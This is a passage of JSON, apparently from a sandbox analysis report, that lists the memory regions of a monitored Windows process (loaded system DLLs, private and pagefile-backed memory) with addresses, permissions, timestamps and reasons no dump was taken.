"entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4126", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:31.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4127", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:31.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4128", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:31.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4129", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:32.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4130", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:32.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4131", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:32.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_4132", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:01:32.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 9043968, "type": "region", "version": 1 }, "end_va": 9109503, "entry_point": 0, "filename": null, "id": "region_4133", "name": "private_0x00000000008a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9043968, "timestamp": "00:01:32.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4134", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:32.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787645951, "entry_point": 1787433941, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4135", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:32.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787752447, "entry_point": 1787695777, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4136", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:32.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1787756544, "type": "region", "version": 1 }, "end_va": 1787793407, "entry_point": 1787762086, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4137", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1787756544, "timestamp": "00:01:32.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787822080, "type": "region", "version": 1 }, "end_va": 1787891711, "entry_point": 1787826944, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4138", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787822080, "timestamp": "00:01:32.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4139", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:32.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4140", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:32.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4141", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:32.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4142", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:32.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4143", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:32.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4144", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:32.007", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4145", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:32.007", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4146", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:32.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4147", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:32.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4148", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:32.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4149", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:32.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4150", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:32.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4151", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:32.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4152", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:32.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4153", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:32.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4154", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:32.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4155", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:32.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4156", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:32.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4157", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:32.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4158", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:32.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4159", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:32.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4160", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:32.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4161", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:32.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4162", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:32.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7405568, "type": "region", "version": 1 }, "end_va": 9011199, "entry_point": 0, "filename": null, "id": "region_4163", "name": "pagefile_0x0000000000710000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7405568, "timestamp": "00:01:32.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4164", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:32.023", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4165", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:32.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4166", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:32.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_4167", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:32.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 999423, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4168", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:32.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_4169", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:32.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_4170", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:32.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_4171", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:32.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 1507328, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4172", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:01:32.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_4173", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_4174", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9109504, "type": "region", "version": 1 }, "end_va": 10686463, "entry_point": 0, "filename": null, "id": "region_4175", "name": "pagefile_0x00000000008b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9109504, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10747904, "type": "region", "version": 1 }, "end_va": 31719423, "entry_point": 0, "filename": null, "id": "region_4176", "name": "pagefile_0x0000000000a40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10747904, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 33882111, "entry_point": 0, "filename": null, "id": "region_4177", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4178", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4179", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:32.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2559999, "entry_point": 0, "filename": null, "id": "region_4180", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:01:32.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4181", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:32.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4182", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:32.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5963775, "entry_point": 0, "filename": null, "id": "region_4183", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:01:32.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35782656, "type": "region", "version": 1 }, "end_va": 36044799, "entry_point": 0, "filename": null, "id": "region_4184", "name": "private_0x0000000002220000", "norm_filename": null, "region_type": "private_memory", "start_va": 35782656, "timestamp": "00:01:32.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4185", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:32.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of 